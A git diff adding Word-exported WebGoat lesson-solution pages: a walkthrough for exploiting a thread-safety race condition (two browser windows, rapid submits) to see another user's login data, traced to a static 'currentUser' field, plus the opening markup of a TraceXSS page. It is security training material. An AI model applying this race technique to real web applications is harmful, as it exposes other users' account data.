+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Exploit Thread Safety Problems <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Web
+applications can handle many HTTP requests simultaneously. Developers often use
+variables that are not thread safe. &nbsp;Thread safety means that the fields
+of an object or class always maintain a valid state when used concurrently by
+multiple threads. It is often possible to exploit a concurrency bug by loading
+the same page as another user at the exact same time. <br>
+Because all threads share the same method area, and the method area is where
+all class variables are stored, multiple threads can attempt to use the same
+class variables concurrently. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to exploit the concurrency error in the web application and view
+login information for another user that is attempting the same function at the
+same time. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>This will
+require the use of two browser windows</span></b><span style='font-family:"Arial","sans-serif"'>.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-size:8.0pt;
+font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
+ id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
+ path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_15" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image002.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 2<span style='font-size:8.0pt;font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Open a new
+browser window by pressing CTRL-N. Position the window so that you see both
+input fields. Enter user name “dave” in the left window and user name “jeff” in
+the right window.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click very
+fast on the submit button in the right window and then in the left window.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:262.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image003.png" o:title=""
+  cropbottom="5791f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=350
+src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image004.jpg" v:shapes="Picture_x0020_16"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>2</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> 2 Browser Windows<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The result
+should be that you receive the same data in both windows, even when using a
+different user name!<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_35"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:274.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image007.png" o:title=""
+  cropbottom="3061f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=366
+src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image009.jpg" v:shapes="Picture_x0020_35"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 2 Completed<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The root-cause
+of this exploit is that the Java code uses a static variable for the user name.
+When submitting twice, the same thread and hence the same static variable
+containing the username of the first request will be used. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This is
+obvious when examining the Java code:<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>private
+static String currentUser;<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/filelist.xml b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/filelist.xml
new file mode 100644
index 000000000..010502f71
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../ThreadSafetyProblem.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image001.png b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image001.png
new file mode 100644
index 000000000..398af0841
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image002.jpg b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image002.jpg
new file mode 100644
index 000000000..52526d118
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image003.png b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image003.png
new file mode 100644
index 000000000..d22701fe3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image004.jpg b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image004.jpg
new file mode 100644
index 000000000..4b222b8f0
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image007.png b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image007.png
new file mode 100644
index 000000000..8c9ea75b7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image009.jpg b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image009.jpg
new file mode 100644
index 000000000..6a1c67f50
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/TraceXSS.html b/main/project/WebContent/lesson_solutions/TraceXSS.html
new file mode 100644
index 000000000..fff4a9aac
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/TraceXSS.html
@@ -0,0 +1,685 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/TraceXSS_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/TraceXSS_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>34</o:TotalTime>
+  <o:Created>2007-07-11T11:02:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:19:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>174</o:Words>
+  <o:Characters>998</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>8</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1170</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/TraceXSS_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/TraceXSS_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
